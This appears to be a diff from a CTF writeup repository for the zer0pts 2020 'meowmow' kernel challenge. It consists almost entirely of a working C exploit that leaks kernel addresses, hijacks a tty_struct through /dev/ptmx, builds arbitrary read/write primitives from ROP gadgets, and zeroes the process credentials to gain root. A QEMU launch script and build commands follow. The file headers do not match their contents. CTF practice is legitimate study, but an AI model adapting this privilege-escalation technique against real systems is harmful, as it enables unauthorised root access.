Updated zer0pts writeup (practice)

Author: HexRabbit

2020/zer0pts-CTF/meowmow/bzImage

@@ -0,0 +1,84 @@
+#include <stdio.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+
+unsigned long buf[0x1000];
+int fd, fd2, fd3;
+unsigned long kbuf, base, gadget;
+
+unsigned arb_read(char *ptr) {
+  // 0xffffffff814369a3 : mov eax, dword ptr [rdx] ; ret
+  unsigned long gadget = base + 0x4369a3;
+  for (int i = 0; i < 0x100; ++i) {
+    lseek(fd, i*8, SEEK_SET);
+    write(fd, &gadget, 8);
+  }
+  return ioctl(fd2, 123, ptr);
+}
+
+unsigned long arb_read64(char *ptr) {
+  return arb_read(ptr) + ((unsigned long)arb_read(ptr+4) << 32);
+}
+
+void arb_write(char *ptr, int val) {
+  // 0xffffffff810a0333 : mov dword ptr [rdx], esi ; ret
+  unsigned long gadget = base + 0xa0333;
+  for (int i = 0; i < 0x100; ++i) {
+    lseek(fd, i*8, SEEK_SET);
+    write(fd, &gadget, 8);
+  }
+  ioctl(fd2, val, ptr);
+}
+
+int main() {
+  fd = open("/dev/memo", O_RDWR);
+  lseek(fd, 0x3f0, SEEK_SET);
+  read(fd, buf, 0x100);
+  kbuf = buf[2] - 2*0x400;
+
+  fd2 = open("/dev/ptmx", O_RDWR | O_NOCTTY);
+  lseek(fd, 0x3f0, SEEK_SET);
+  read(fd, (char *)buf, 0x100);
+  base = buf[5] - 0xe65900;
+
+  printf("0x%lx 0x%lx\n", kbuf, base);
+
+  buf[5] = kbuf;
+  lseek(fd, 0x3f0, SEEK_SET);
+  write(fd, (char *)buf, 0x100);
+
+  unsigned long curr = base + 0x1211740; // init_task
+  int tasks_offset = 0x388;
+  int pid_offset = 0x488;
+  int comm_offset = 0x628;
+  int cred_offset = 0x618;
+  int pid = getpid();
+  char comm[0x10];
+
+  while(1) {
+    *(unsigned long *)comm = arb_read64(curr + comm_offset);
+    *((unsigned long *)comm + 1) = arb_read64(curr + comm_offset + 8);
+    printf("TASK: %s @ %lx\n", comm, curr);
+
+    int task_pid = arb_read(curr + pid_offset);
+    if (pid == task_pid) break;
+
+    curr = arb_read64(curr + tasks_offset) - tasks_offset;
+  }
+
+  unsigned long cred = arb_read64(curr + cred_offset);
+  for (int i = 0; i < 8; ++i) {
+    arb_write(cred + 4 + i*4, 0);
+  }
+
+  int uid, euid, suid;
+  getresuid(&uid, &euid, &suid);
+  printf("uid: %d, euid: %d, suid: %d\n", uid, euid, suid);
+
+  char flag[0x100];
+  fd3 = open("/flag", O_RDONLY);
+  read(fd3, flag, 0x100);
+  printf("flag: %s\n", flag);
+  while(1); // since we overwrite all func handler(including ttyrelease), hang program here
+}

2020/zer0pts-CTF/meowmow/exploit.c

@@ -0,0 +1,9 @@
+#!/bin/sh
+qemu-system-x86_64 \
+    -m 256M \
+    -kernel ./bzImage \
+    -initrd ./modified.cpio \
+    -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 kaslr quiet" \
+    -cpu kvm64,+smep,+smap \
+    -monitor /dev/null \
+    -nographic -s

2020/zer0pts-CTF/meowmow/memo.ko

@@ -0,0 +1,6 @@
+gcc exploit.c -static -o exp
+cp exp rootfs
+cd rootfs
+find . | cpio -o --format=newc > ../modified.cpio
+cd ..
+./start.sh